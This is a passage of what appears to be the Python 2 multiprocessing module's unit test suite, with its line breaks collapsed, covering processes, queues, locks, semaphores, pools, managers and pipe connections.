self.func(*args, **kwds) finally: self.elapsed = time.time() - t # # Base class for test cases # class BaseTestCase(object): ALLOWED_TYPES = ('processes', 'manager', 'threads') def assertTimingAlmostEqual(self, a, b): if CHECK_TIMINGS: self.assertAlmostEqual(a, b, 1) def assertReturnsIfImplemented(self, value, func, *args): try: res = func(*args) except NotImplementedError: pass else: return self.assertEqual(value, res) # For the sanity of Windows users, rather than crashing or freezing in # multiple ways. 
def __reduce__(self, *args): raise NotImplementedError("shouldn't try to pickle a test case") __reduce_ex__ = __reduce__ # # Return the value of a semaphore # def get_value(self): try: return self.get_value() except AttributeError: try: return self._Semaphore__value except AttributeError: try: return self._value except AttributeError: raise NotImplementedError # # Testcases # class _TestProcess(BaseTestCase): ALLOWED_TYPES = ('processes', 'threads') def test_current(self): if self.TYPE == 'threads': return current = self.current_process() authkey = current.authkey self.assertTrue(current.is_alive()) self.assertTrue(not current.daemon) self.assertIsInstance(authkey, bytes) self.assertTrue(len(authkey) > 0) self.assertEqual(current.ident, os.getpid()) self.assertEqual(current.exitcode, None) @classmethod def _test(cls, q, *args, **kwds): current = cls.current_process() q.put(args) q.put(kwds) q.put(current.name) if cls.TYPE != 'threads': q.put(bytes(current.authkey)) q.put(current.pid) def test_process(self): q = self.Queue(1) e = self.Event() args = (q, 1, 2) kwargs = {'hello':23, 'bye':2.54} name = 'SomeProcess' p = self.Process( target=self._test, args=args, kwargs=kwargs, name=name ) p.daemon = True current = self.current_process() if self.TYPE != 'threads': self.assertEqual(p.authkey, current.authkey) self.assertEqual(p.is_alive(), False) self.assertEqual(p.daemon, True) self.assertNotIn(p, self.active_children()) self.assertTrue(type(self.active_children()) is list) self.assertEqual(p.exitcode, None) p.start() self.assertEqual(p.exitcode, None) self.assertEqual(p.is_alive(), True) self.assertIn(p, self.active_children()) self.assertEqual(q.get(), args[1:]) self.assertEqual(q.get(), kwargs) self.assertEqual(q.get(), p.name) if self.TYPE != 'threads': self.assertEqual(q.get(), current.authkey) self.assertEqual(q.get(), p.pid) p.join() self.assertEqual(p.exitcode, 0) self.assertEqual(p.is_alive(), False) self.assertNotIn(p, self.active_children()) @classmethod def _test_terminate(cls): time.sleep(1000) def test_terminate(self): if self.TYPE == 'threads': return p = self.Process(target=self._test_terminate) p.daemon = True p.start() self.assertEqual(p.is_alive(), True) self.assertIn(p, self.active_children()) self.assertEqual(p.exitcode, None) p.terminate() join = TimingWrapper(p.join) self.assertEqual(join(), None) self.assertTimingAlmostEqual(join.elapsed, 0.0) self.assertEqual(p.is_alive(), False) self.assertNotIn(p, self.active_children()) p.join() # XXX sometimes get p.exitcode == 0 on Windows ... 
#self.assertEqual(p.exitcode, -signal.SIGTERM) def test_cpu_count(self): try: cpus = multiprocessing.cpu_count() except NotImplementedError: cpus = 1 self.assertTrue(type(cpus) is int) self.assertTrue(cpus >= 1) def test_active_children(self): self.assertEqual(type(self.active_children()), list) p = self.Process(target=time.sleep, args=(DELTA,)) self.assertNotIn(p, self.active_children()) p.daemon = True p.start() self.assertIn(p, self.active_children()) p.join() self.assertNotIn(p, self.active_children()) @classmethod def _test_recursion(cls, wconn, id): from multiprocessing import forking wconn.send(id) if len(id) < 2: for i in range(2): p = cls.Process( target=cls._test_recursion, args=(wconn, id+[i]) ) p.start() p.join() def test_recursion(self): rconn, wconn = self.Pipe(duplex=False) self._test_recursion(wconn, []) time.sleep(DELTA) result = [] while rconn.poll(): result.append(rconn.recv()) expected = [ [], [0], [0, 0], [0, 1], [1], [1, 0], [1, 1] ] self.assertEqual(result, expected) @classmethod def _test_sys_exit(cls, reason, testfn): sys.stderr = open(testfn, 'w') sys.exit(reason) def test_sys_exit(self): # See Issue 13854 if self.TYPE == 'threads': return testfn = test_support.TESTFN self.addCleanup(test_support.unlink, testfn) for reason, code in (([1, 2, 3], 1), ('ignore this', 0)): p = self.Process(target=self._test_sys_exit, args=(reason, testfn)) p.daemon = True p.start() p.join(5) self.assertEqual(p.exitcode, code) with open(testfn, 'r') as f: self.assertEqual(f.read().rstrip(), str(reason)) for reason in (True, False, 8): p = self.Process(target=sys.exit, args=(reason,)) p.daemon = True p.start() p.join(5) self.assertEqual(p.exitcode, reason) # # # class _UpperCaser(multiprocessing.Process): def __init__(self): multiprocessing.Process.__init__(self) self.child_conn, self.parent_conn = multiprocessing.Pipe() def run(self): self.parent_conn.close() for s in iter(self.child_conn.recv, None): self.child_conn.send(s.upper()) self.child_conn.close() def submit(self, s): assert type(s) is str self.parent_conn.send(s) return self.parent_conn.recv() def stop(self): self.parent_conn.send(None) self.parent_conn.close() self.child_conn.close() class _TestSubclassingProcess(BaseTestCase): ALLOWED_TYPES = ('processes',) def test_subclassing(self): uppercaser = _UpperCaser() uppercaser.daemon = True uppercaser.start() self.assertEqual(uppercaser.submit('hello'), 'HELLO') self.assertEqual(uppercaser.submit('world'), 'WORLD') uppercaser.stop() uppercaser.join() # # # def queue_empty(q): if hasattr(q, 'empty'): return q.empty() else: return q.qsize() == 0 def queue_full(q, maxsize): if hasattr(q, 'full'): return q.full() else: return q.qsize() == maxsize class _TestQueue(BaseTestCase): @classmethod def _test_put(cls, queue, child_can_start, parent_can_continue): child_can_start.wait() for i in range(6): queue.get() parent_can_continue.set() def test_put(self): MAXSIZE = 6 queue = self.Queue(maxsize=MAXSIZE) child_can_start = self.Event() parent_can_continue = self.Event() proc = self.Process( target=self._test_put, args=(queue, child_can_start, parent_can_continue) ) proc.daemon = True proc.start() self.assertEqual(queue_empty(queue), True) self.assertEqual(queue_full(queue, MAXSIZE), False) queue.put(1) queue.put(2, True) queue.put(3, True, None) queue.put(4, False) queue.put(5, False, None) queue.put_nowait(6) # the values may be in buffer but not yet in pipe so sleep a bit time.sleep(DELTA) self.assertEqual(queue_empty(queue), False) self.assertEqual(queue_full(queue, MAXSIZE), True) put 
= TimingWrapper(queue.put) put_nowait = TimingWrapper(queue.put_nowait) self.assertRaises(Queue.Full, put, 7, False) self.assertTimingAlmostEqual(put.elapsed, 0) self.assertRaises(Queue.Full, put, 7, False, None) self.assertTimingAlmostEqual(put.elapsed, 0) self.assertRaises(Queue.Full, put_nowait, 7) self.assertTimingAlmostEqual(put_nowait.elapsed, 0) self.assertRaises(Queue.Full, put, 7, True, TIMEOUT1) self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1) self.assertRaises(Queue.Full, put, 7, False, TIMEOUT2) self.assertTimingAlmostEqual(put.elapsed, 0) self.assertRaises(Queue.Full, put, 7, True, timeout=TIMEOUT3) self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3) child_can_start.set() parent_can_continue.wait() self.assertEqual(queue_empty(queue), True) self.assertEqual(queue_full(queue, MAXSIZE), False) proc.join() @classmethod def _test_get(cls, queue, child_can_start, parent_can_continue): child_can_start.wait() #queue.put(1) queue.put(2) queue.put(3) queue.put(4) queue.put(5) parent_can_continue.set() def test_get(self): queue = self.Queue() child_can_start = self.Event() parent_can_continue = self.Event() proc = self.Process( target=self._test_get, args=(queue, child_can_start, parent_can_continue) ) proc.daemon = True proc.start() self.assertEqual(queue_empty(queue), True) child_can_start.set() parent_can_continue.wait() time.sleep(DELTA) self.assertEqual(queue_empty(queue), False) # Hangs unexpectedly, remove for now #self.assertEqual(queue.get(), 1) self.assertEqual(queue.get(True, None), 2) self.assertEqual(queue.get(True), 3) self.assertEqual(queue.get(timeout=1), 4) self.assertEqual(queue.get_nowait(), 5) self.assertEqual(queue_empty(queue), True) get = TimingWrapper(queue.get) get_nowait = TimingWrapper(queue.get_nowait) self.assertRaises(Queue.Empty, get, False) self.assertTimingAlmostEqual(get.elapsed, 0) self.assertRaises(Queue.Empty, get, False, None) self.assertTimingAlmostEqual(get.elapsed, 0) self.assertRaises(Queue.Empty, get_nowait) self.assertTimingAlmostEqual(get_nowait.elapsed, 0) self.assertRaises(Queue.Empty, get, True, TIMEOUT1) self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1) self.assertRaises(Queue.Empty, get, False, TIMEOUT2) self.assertTimingAlmostEqual(get.elapsed, 0) self.assertRaises(Queue.Empty, get, timeout=TIMEOUT3) self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3) proc.join() @classmethod def _test_fork(cls, queue): for i in range(10, 20): queue.put(i) # note that at this point the items may only be buffered, so the # process cannot shutdown until the feeder thread has finished # pushing items onto the pipe. def test_fork(self): # Old versions of Queue would fail to create a new feeder # thread for a forked process if the original process had its # own feeder thread. This test checks that this no longer # happens. 
queue = self.Queue() # put items on queue so that main process starts a feeder thread for i in range(10): queue.put(i) # wait to make sure thread starts before we fork a new process time.sleep(DELTA) # fork process p = self.Process(target=self._test_fork, args=(queue,)) p.daemon = True p.start() # check that all expected items are in the queue for i in range(20): self.assertEqual(queue.get(), i) self.assertRaises(Queue.Empty, queue.get, False) p.join() def test_qsize(self): q = self.Queue() try: self.assertEqual(q.qsize(), 0) except NotImplementedError: return q.put(1) self.assertEqual(q.qsize(), 1) q.put(5) self.assertEqual(q.qsize(), 2) q.get() self.assertEqual(q.qsize(), 1) q.get() self.assertEqual(q.qsize(), 0) @classmethod def _test_task_done(cls, q): for obj in iter(q.get, None): time.sleep(DELTA) q.task_done() def test_task_done(self): queue = self.JoinableQueue() if sys.version_info < (2, 5) and not hasattr(queue, 'task_done'): self.skipTest("requires 'queue.task_done()' method") workers = [self.Process(target=self._test_task_done, args=(queue,)) for i in xrange(4)] for p in workers: p.daemon = True p.start() for i in xrange(10): queue.put(i) queue.join() for p in workers: queue.put(None) for p in workers: p.join() # # # class _TestLock(BaseTestCase): def test_lock(self): lock = self.Lock() self.assertEqual(lock.acquire(), True) self.assertEqual(lock.acquire(False), False) self.assertEqual(lock.release(), None) self.assertRaises((ValueError, threading.ThreadError), lock.release) def test_rlock(self): lock = self.RLock() self.assertEqual(lock.acquire(), True) self.assertEqual(lock.acquire(), True) self.assertEqual(lock.acquire(), True) self.assertEqual(lock.release(), None) self.assertEqual(lock.release(), None) self.assertEqual(lock.release(), None) self.assertRaises((AssertionError, RuntimeError), lock.release) def test_lock_context(self): with self.Lock(): pass class _TestSemaphore(BaseTestCase): def _test_semaphore(self, sem): self.assertReturnsIfImplemented(2, get_value, sem) self.assertEqual(sem.acquire(), True) self.assertReturnsIfImplemented(1, get_value, sem) self.assertEqual(sem.acquire(), True) self.assertReturnsIfImplemented(0, get_value, sem) self.assertEqual(sem.acquire(False), False) self.assertReturnsIfImplemented(0, get_value, sem) self.assertEqual(sem.release(), None) self.assertReturnsIfImplemented(1, get_value, sem) self.assertEqual(sem.release(), None) self.assertReturnsIfImplemented(2, get_value, sem) def test_semaphore(self): sem = self.Semaphore(2) self._test_semaphore(sem) self.assertEqual(sem.release(), None) self.assertReturnsIfImplemented(3, get_value, sem) self.assertEqual(sem.release(), None) self.assertReturnsIfImplemented(4, get_value, sem) def test_bounded_semaphore(self): sem = self.BoundedSemaphore(2) self._test_semaphore(sem) # Currently fails on OS/X #if HAVE_GETVALUE: # self.assertRaises(ValueError, sem.release) # self.assertReturnsIfImplemented(2, get_value, sem) def test_timeout(self): if self.TYPE != 'processes': return sem = self.Semaphore(0) acquire = TimingWrapper(sem.acquire) self.assertEqual(acquire(False), False) self.assertTimingAlmostEqual(acquire.elapsed, 0.0) self.assertEqual(acquire(False, None), False) self.assertTimingAlmostEqual(acquire.elapsed, 0.0) self.assertEqual(acquire(False, TIMEOUT1), False) self.assertTimingAlmostEqual(acquire.elapsed, 0) self.assertEqual(acquire(True, TIMEOUT2), False) self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2) self.assertEqual(acquire(timeout=TIMEOUT3), False) 
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3) class _TestCondition(BaseTestCase): @classmethod def f(cls, cond, sleeping, woken, timeout=None): cond.acquire() sleeping.release() cond.wait(timeout) woken.release() cond.release() def check_invariant(self, cond): # this is only supposed to succeed when there are no sleepers if self.TYPE == 'processes': try: sleepers = (cond._sleeping_count.get_value() - cond._woken_count.get_value()) self.assertEqual(sleepers, 0) self.assertEqual(cond._wait_semaphore.get_value(), 0) except NotImplementedError: pass def test_notify(self): cond = self.Condition() sleeping = self.Semaphore(0) woken = self.Semaphore(0) p = self.Process(target=self.f, args=(cond, sleeping, woken)) p.daemon = True p.start() p = threading.Thread(target=self.f, args=(cond, sleeping, woken)) p.daemon = True p.start() # wait for both children to start sleeping sleeping.acquire() sleeping.acquire() # check no process/thread has woken up time.sleep(DELTA) self.assertReturnsIfImplemented(0, get_value, woken) # wake up one process/thread cond.acquire() cond.notify() cond.release() # check one process/thread has woken up time.sleep(DELTA) self.assertReturnsIfImplemented(1, get_value, woken) # wake up another cond.acquire() cond.notify() cond.release() # check other has woken up time.sleep(DELTA) self.assertReturnsIfImplemented(2, get_value, woken) # check state is not mucked up self.check_invariant(cond) p.join() def test_notify_all(self): cond = self.Condition() sleeping = self.Semaphore(0) woken = self.Semaphore(0) # start some threads/processes which will timeout for i in range(3): p = self.Process(target=self.f, args=(cond, sleeping, woken, TIMEOUT1)) p.daemon = True p.start() t = threading.Thread(target=self.f, args=(cond, sleeping, woken, TIMEOUT1)) t.daemon = True t.start() # wait for them all to sleep for i in xrange(6): sleeping.acquire() # check they have all timed out for i in xrange(6): woken.acquire() self.assertReturnsIfImplemented(0, get_value, woken) # check state is not mucked up self.check_invariant(cond) # start some more threads/processes for i in range(3): p = self.Process(target=self.f, args=(cond, sleeping, woken)) p.daemon = True p.start() t = threading.Thread(target=self.f, args=(cond, sleeping, woken)) t.daemon = True t.start() # wait for them to all sleep for i in xrange(6): sleeping.acquire() # check no process/thread has woken up time.sleep(DELTA) self.assertReturnsIfImplemented(0, get_value, woken) # wake them all up cond.acquire() cond.notify_all() cond.release() # check they have all woken time.sleep(DELTA) self.assertReturnsIfImplemented(6, get_value, woken) # check state is not mucked up self.check_invariant(cond) def test_timeout(self): cond = self.Condition() wait = TimingWrapper(cond.wait) cond.acquire() res = wait(TIMEOUT1) cond.release() self.assertEqual(res, None) self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1) class _TestEvent(BaseTestCase): @classmethod def _test_event(cls, event): time.sleep(TIMEOUT2) event.set() def test_event(self): event = self.Event() wait = TimingWrapper(event.wait) # Removed temporarily, due to API shear, this does not # work with threading._Event objects. is_set == isSet self.assertEqual(event.is_set(), False) # Removed, threading.Event.wait() will return the value of the __flag # instead of None. 
API Shear with the semaphore backed mp.Event self.assertEqual(wait(0.0), False) self.assertTimingAlmostEqual(wait.elapsed, 0.0) self.assertEqual(wait(TIMEOUT1), False) self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1) event.set() # See note above on the API differences self.assertEqual(event.is_set(), True) self.assertEqual(wait(), True) self.assertTimingAlmostEqual(wait.elapsed, 0.0) self.assertEqual(wait(TIMEOUT1), True) self.assertTimingAlmostEqual(wait.elapsed, 0.0) # self.assertEqual(event.is_set(), True) event.clear() #self.assertEqual(event.is_set(), False) p = self.Process(target=self._test_event, args=(event,)) p.daemon = True p.start() self.assertEqual(wait(), True) # # # class _TestValue(BaseTestCase): ALLOWED_TYPES = ('processes',) codes_values = [ ('i', 4343, 24234), ('d', 3.625, -4.25), ('h', -232, 234), ('c', latin('x'), latin('y')) ] def setUp(self): if not HAS_SHAREDCTYPES: self.skipTest("requires multiprocessing.sharedctypes") @classmethod def _test(cls, values): for sv, cv in zip(values, cls.codes_values): sv.value = cv[2] def test_value(self, raw=False): if raw: values = [self.RawValue(code, value) for code, value, _ in self.codes_values] else: values = [self.Value(code, value) for code, value, _ in self.codes_values] for sv, cv in zip(values, self.codes_values): self.assertEqual(sv.value, cv[1]) proc = self.Process(target=self._test, args=(values,)) proc.daemon = True proc.start() proc.join() for sv, cv in zip(values, self.codes_values): self.assertEqual(sv.value, cv[2]) def test_rawvalue(self): self.test_value(raw=True) def test_getobj_getlock(self): val1 = self.Value('i', 5) lock1 = val1.get_lock() obj1 = val1.get_obj() val2 = self.Value('i', 5, lock=None) lock2 = val2.get_lock() obj2 = val2.get_obj() lock = self.Lock() val3 = self.Value('i', 5, lock=lock) lock3 = val3.get_lock() obj3 = val3.get_obj() self.assertEqual(lock, lock3) arr4 = self.Value('i', 5, lock=False) self.assertFalse(hasattr(arr4, 'get_lock')) self.assertFalse(hasattr(arr4, 'get_obj')) self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue') arr5 = self.RawValue('i', 5) self.assertFalse(hasattr(arr5, 'get_lock')) self.assertFalse(hasattr(arr5, 'get_obj')) class _TestArray(BaseTestCase): ALLOWED_TYPES = ('processes',) @classmethod def f(cls, seq): for i in range(1, len(seq)): seq[i] += seq[i-1] @unittest.skipIf(c_int is None, "requires _ctypes") def test_array(self, raw=False): seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831] if raw: arr = self.RawArray('i', seq) else: arr = self.Array('i', seq) self.assertEqual(len(arr), len(seq)) self.assertEqual(arr[3], seq[3]) self.assertEqual(list(arr[2:7]), list(seq[2:7])) arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4]) self.assertEqual(list(arr[:]), seq) self.f(seq) p = self.Process(target=self.f, args=(arr,)) p.daemon = True p.start() p.join() self.assertEqual(list(arr[:]), seq) @unittest.skipIf(c_int is None, "requires _ctypes") def test_array_from_size(self): size = 10 # Test for zeroing (see issue #11675). # The repetition below strengthens the test by increasing the chances # of previously allocated non-zero memory being used for the new array # on the 2nd and 3rd loops. 
for _ in range(3): arr = self.Array('i', size) self.assertEqual(len(arr), size) self.assertEqual(list(arr), [0] * size) arr[:] = range(10) self.assertEqual(list(arr), range(10)) del arr @unittest.skipIf(c_int is None, "requires _ctypes") def test_rawarray(self): self.test_array(raw=True) @unittest.skipIf(c_int is None, "requires _ctypes") def test_array_accepts_long(self): arr = self.Array('i', 10L) self.assertEqual(len(arr), 10) raw_arr = self.RawArray('i', 10L) self.assertEqual(len(raw_arr), 10) @unittest.skipIf(c_int is None, "requires _ctypes") def test_getobj_getlock_obj(self): arr1 = self.Array('i', range(10)) lock1 = arr1.get_lock() obj1 = arr1.get_obj() arr2 = self.Array('i', range(10), lock=None) lock2 = arr2.get_lock() obj2 = arr2.get_obj() lock = self.Lock() arr3 = self.Array('i', range(10), lock=lock) lock3 = arr3.get_lock() obj3 = arr3.get_obj() self.assertEqual(lock, lock3) arr4 = self.Array('i', range(10), lock=False) self.assertFalse(hasattr(arr4, 'get_lock')) self.assertFalse(hasattr(arr4, 'get_obj')) self.assertRaises(AttributeError, self.Array, 'i', range(10), lock='notalock') arr5 = self.RawArray('i', range(10)) self.assertFalse(hasattr(arr5, 'get_lock')) self.assertFalse(hasattr(arr5, 'get_obj')) # # # class _TestContainers(BaseTestCase): ALLOWED_TYPES = ('manager',) def test_list(self): a = self.list(range(10)) self.assertEqual(a[:], range(10)) b = self.list() self.assertEqual(b[:], []) b.extend(range(5)) self.assertEqual(b[:], range(5)) self.assertEqual(b[2], 2) self.assertEqual(b[2:10], [2,3,4]) b *= 2 self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]) self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6]) self.assertEqual(a[:], range(10)) d = [a, b] e = self.list(d) self.assertEqual( e[:], [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]] ) f = self.list([a]) a.append('hello') self.assertEqual(f[:], [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello']]) def test_dict(self): d = self.dict() indices = range(65, 70) for i in indices: d[i] = chr(i) self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices)) self.assertEqual(sorted(d.keys()), indices) self.assertEqual(sorted(d.values()), [chr(i) for i in indices]) self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices]) def test_namespace(self): n = self.Namespace() n.name = 'Bob' n.job = 'Builder' n._hidden = 'hidden' self.assertEqual((n.name, n.job), ('Bob', 'Builder')) del n.job self.assertEqual(str(n), "Namespace(name='Bob')") self.assertTrue(hasattr(n, 'name')) self.assertTrue(not hasattr(n, 'job')) # # # def sqr(x, wait=0.0): time.sleep(wait) return x*x class _TestPool(BaseTestCase): def test_apply(self): papply = self.pool.apply self.assertEqual(papply(sqr, (5,)), sqr(5)) self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3)) def test_map(self): pmap = self.pool.map self.assertEqual(pmap(sqr, range(10)), map(sqr, range(10))) self.assertEqual(pmap(sqr, range(100), chunksize=20), map(sqr, range(100))) def test_map_chunksize(self): try: self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1) except multiprocessing.TimeoutError: self.fail("pool.map_async with chunksize stalled on null list") def test_async(self): res = self.pool.apply_async(sqr, (7, TIMEOUT1,)) get = TimingWrapper(res.get) self.assertEqual(get(), 49) self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1) def test_async_timeout(self): res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 0.2)) get = TimingWrapper(res.get) self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2) 
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2) def test_imap(self): it = self.pool.imap(sqr, range(10)) self.assertEqual(list(it), map(sqr, range(10))) it = self.pool.imap(sqr, range(10)) for i in range(10): self.assertEqual(it.next(), i*i) self.assertRaises(StopIteration, it.next) it = self.pool.imap(sqr, range(1000), chunksize=100) for i in range(1000): self.assertEqual(it.next(), i*i) self.assertRaises(StopIteration, it.next) def test_imap_unordered(self): it = self.pool.imap_unordered(sqr, range(1000)) self.assertEqual(sorted(it), map(sqr, range(1000))) it = self.pool.imap_unordered(sqr, range(1000), chunksize=53) self.assertEqual(sorted(it), map(sqr, range(1000))) def test_make_pool(self): self.assertRaises(ValueError, multiprocessing.Pool, -1) self.assertRaises(ValueError, multiprocessing.Pool, 0) p = multiprocessing.Pool(3) self.assertEqual(3, len(p._pool)) p.close() p.join() def test_terminate(self): if self.TYPE == 'manager': # On Unix a forked process increfs each shared object to # which its parent process held a reference. If the # forked process gets terminated then there is likely to # be a reference leak. So to prevent # _TestZZZNumberOfObjects from failing we skip this test # when using a manager. return result = self.pool.map_async( time.sleep, [0.1 for i in range(10000)], chunksize=1 ) self.pool.terminate() join = TimingWrapper(self.pool.join) join() self.assertTrue(join.elapsed < 0.2) def test_empty_iterable(self): # See Issue 12157 p = self.Pool(1) self.assertEqual(p.map(sqr, []), []) self.assertEqual(list(p.imap(sqr, [])), []) self.assertEqual(list(p.imap_unordered(sqr, [])), []) self.assertEqual(p.map_async(sqr, []).get(), []) p.close() p.join() def unpickleable_result(): return lambda: 42 class _TestPoolWorkerErrors(BaseTestCase): ALLOWED_TYPES = ('processes', ) def test_unpickleable_result(self): from multiprocessing.pool import MaybeEncodingError p = multiprocessing.Pool(2) # Make sure we don't lose pool processes because of encoding errors. for iteration in range(20): res = p.apply_async(unpickleable_result) self.assertRaises(MaybeEncodingError, res.get) p.close() p.join() class _TestPoolWorkerLifetime(BaseTestCase): ALLOWED_TYPES = ('processes', ) def test_pool_worker_lifetime(self): p = multiprocessing.Pool(3, maxtasksperchild=10) self.assertEqual(3, len(p._pool)) origworkerpids = [w.pid for w in p._pool] # Run many tasks so each worker gets replaced (hopefully) results = [] for i in range(100): results.append(p.apply_async(sqr, (i, ))) # Fetch the results and verify we got the right answers, # also ensuring all the tasks have completed. for (j, res) in enumerate(results): self.assertEqual(res.get(), sqr(j)) # Refill the pool p._repopulate_pool() # Wait until all workers are alive # (countdown * DELTA = 5 seconds max startup process time) countdown = 50 while countdown and not all(w.is_alive() for w in p._pool): countdown -= 1 time.sleep(DELTA) finalworkerpids = [w.pid for w in p._pool] # All pids should be assigned. See issue #7805. self.assertNotIn(None, origworkerpids) self.assertNotIn(None, finalworkerpids) # Finally, check that the worker pids have changed self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids)) p.close() p.join() def test_pool_worker_lifetime_early_close(self): # Issue #10332: closing a pool whose workers have limited lifetimes # before all the tasks completed would make join() hang. 
p = multiprocessing.Pool(3, maxtasksperchild=1) results = [] for i in range(6): results.append(p.apply_async(sqr, (i, 0.3))) p.close() p.join() # check the results for (j, res) in enumerate(results): self.assertEqual(res.get(), sqr(j)) # # Test that manager has expected number of shared objects left # class _TestZZZNumberOfObjects(BaseTestCase): # Because test cases are sorted alphabetically, this one will get # run after all the other tests for the manager. It tests that # there have been no "reference leaks" for the manager's shared # objects. Note the comment in _TestPool.test_terminate(). ALLOWED_TYPES = ('manager',) def test_number_of_objects(self): EXPECTED_NUMBER = 1 # the pool object is still alive multiprocessing.active_children() # discard dead process objs gc.collect() # do garbage collection refs = self.manager._number_of_objects() debug_info = self.manager._debug_info() if refs != EXPECTED_NUMBER: print self.manager._debug_info() print debug_info self.assertEqual(refs, EXPECTED_NUMBER) # # Test of creating a customized manager class # from multiprocessing.managers import BaseManager, BaseProxy, RemoteError class FooBar(object): def f(self): return 'f()' def g(self): raise ValueError def _h(self): return '_h()' def baz(): for i in xrange(10): yield i*i class IteratorProxy(BaseProxy): _exposed_ = ('next', '__next__') def __iter__(self): return self def next(self): return self._callmethod('next') def __next__(self): return self._callmethod('__next__') class MyManager(BaseManager): pass MyManager.register('Foo', callable=FooBar) MyManager.register('Bar', callable=FooBar, exposed=('f', '_h')) MyManager.register('baz', callable=baz, proxytype=IteratorProxy) class _TestMyManager(BaseTestCase): ALLOWED_TYPES = ('manager',) def test_mymanager(self): manager = MyManager() manager.start() foo = manager.Foo() bar = manager.Bar() baz = manager.baz() foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)] bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)] self.assertEqual(foo_methods, ['f', 'g']) self.assertEqual(bar_methods, ['f', '_h']) self.assertEqual(foo.f(), 'f()') self.assertRaises(ValueError, foo.g) self.assertEqual(foo._callmethod('f'), 'f()') self.assertRaises(RemoteError, foo._callmethod, '_h') self.assertEqual(bar.f(), 'f()') self.assertEqual(bar._h(), '_h()') self.assertEqual(bar._callmethod('f'), 'f()') self.assertEqual(bar._callmethod('_h'), '_h()') self.assertEqual(list(baz), [i*i for i in range(10)]) manager.shutdown() # # Test of connecting to a remote server and using xmlrpclib for serialization # _queue = Queue.Queue() def get_queue(): return _queue class QueueManager(BaseManager): '''manager class used by server process''' QueueManager.register('get_queue', callable=get_queue) class QueueManager2(BaseManager): '''manager class which specifies the same interface as QueueManager''' QueueManager2.register('get_queue') SERIALIZER = 'xmlrpclib' class _TestRemoteManager(BaseTestCase): ALLOWED_TYPES = ('manager',) @classmethod def _putter(cls, address, authkey): manager = QueueManager2( address=address, authkey=authkey, serializer=SERIALIZER ) manager.connect() queue = manager.get_queue() queue.put(('hello world', None, True, 2.25)) def test_remote(self): authkey = os.urandom(32) manager = QueueManager( address=('localhost', 0), authkey=authkey, serializer=SERIALIZER ) manager.start() p = self.Process(target=self._putter, args=(manager.address, authkey)) p.daemon = True p.start() manager2 = QueueManager2( address=manager.address, 
authkey=authkey, serializer=SERIALIZER ) manager2.connect() queue = manager2.get_queue() # Note that xmlrpclib will deserialize object as a list not a tuple self.assertEqual(queue.get(), ['hello world', None, True, 2.25]) # Because we are using xmlrpclib for serialization instead of # pickle this will cause a serialization error. self.assertRaises(Exception, queue.put, time.sleep) # Make queue finalizer run before the server is stopped del queue manager.shutdown() class _TestManagerRestart(BaseTestCase): @classmethod def _putter(cls, address, authkey): manager = QueueManager( address=address, authkey=authkey, serializer=SERIALIZER) manager.connect() queue = manager.get_queue() queue.put('hello world') def test_rapid_restart(self): authkey = os.urandom(32) manager = QueueManager( address=('localhost', 0), authkey=authkey, serializer=SERIALIZER) srvr = manager.get_server() addr = srvr.address # Close the connection.Listener socket which gets opened as a part # of manager.get_server(). It's not needed for the test. srvr.listener.close() manager.start() p = self.Process(target=self._putter, args=(manager.address, authkey)) p.daemon = True p.start() queue = manager.get_queue() self.assertEqual(queue.get(), 'hello world') del queue manager.shutdown() manager = QueueManager( address=addr, authkey=authkey, serializer=SERIALIZER) manager.start() manager.shutdown() # # # SENTINEL = latin('') class _TestConnection(BaseTestCase): ALLOWED_TYPES = ('processes', 'threads') @classmethod def _echo(cls, conn): for msg in iter(conn.recv_bytes, SENTINEL): conn.send_bytes(msg) conn.close() def test_connection(self): conn, child_conn = self.Pipe() p = self.Process(target=self._echo, args=(child_conn,)) p.daemon = True p.start() seq = [1, 2.25, None] msg = latin('hello world') longmsg = msg * 10 arr = array.array('i', range(4)) if self.TYPE == 'processes': self.assertEqual(type(conn.fileno()), int) self.assertEqual(conn.send(seq), None) self.assertEqual(conn.recv(), seq) self.assertEqual(conn.send_bytes(msg), None) self.assertEqual(conn.recv_bytes(), msg) if self.TYPE == 'processes': buffer = array.array('i', [0]*10) expected = list(arr) + [0] * (10 - len(arr)) self.assertEqual(conn.send_bytes(arr), None) self.assertEqual(conn.recv_bytes_into(buffer), len(arr) * buffer.itemsize) self.assertEqual(list(buffer), expected) buffer = array.array('i', [0]*10) expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr)) self.assertEqual(conn.send_bytes(arr), None) self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize), len(arr) * buffer.itemsize) self.assertEqual(list(buffer), expected) buffer = bytearray(latin(' ' * 40)) self.assertEqual(conn.send_bytes(longmsg), None) try: res = conn.recv_bytes_into(buffer) except multiprocessing.BufferTooShort, e: self.assertEqual(e.args, (longmsg,)) else: self.fail('expected BufferTooShort, got %s' % res) poll = TimingWrapper(conn.poll) self.assertEqual(poll(), False) self.assertTimingAlmostEqual(poll.elapsed, 0) self.assertEqual(poll(TIMEOUT1), False) self.assertTimingAlmostEqual(poll.elapsed, 